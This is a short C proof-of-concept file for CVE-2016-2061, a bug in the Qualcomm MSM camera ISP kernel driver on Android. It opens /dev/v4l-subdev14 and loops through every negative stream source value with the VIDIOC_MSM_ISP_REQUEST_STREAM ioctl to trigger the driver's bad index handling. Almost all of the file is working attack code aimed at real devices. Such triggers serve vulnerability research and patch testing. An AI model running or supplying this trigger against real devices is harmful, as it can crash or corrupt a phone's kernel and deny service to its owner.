CVE-2016-2061.c

/**
 *
 * CVE-2016-2061.c
 * https://code.google.com/p/android/issues/detail?id=201060
 *
 * https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c#30
 *
 * Use: -I ./kernels/msm/include/media/
 */


#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "msmb_isp.h" //./include/media/msmb_isp.h


static int open_subdev(const char* dev)
{
	int fd = open(dev, O_RDWR);
	if (fd < 0) {
		printf("Failed to open %s\n", dev);
		exit(EXIT_FAILURE);
	}
	return fd;
}

static void break_stuff(int fd) {
	struct msm_vfe_axi_stream_request_cmd stream_cfg_cmd = { 0 };
	int i;
	for (i = INT_MIN; i < 0 ; i++) {
		stream_cfg_cmd.stream_src = i;
		printf("ioctl on %d\n", i);
		ioctl(fd, VIDIOC_MSM_ISP_REQUEST_STREAM, &stream_cfg_cmd);
	}

}
int main(void)
{
	int fd = -1;
	fd = open_subdev("/dev/v4l-subdev14");
	break_stuff(fd);

}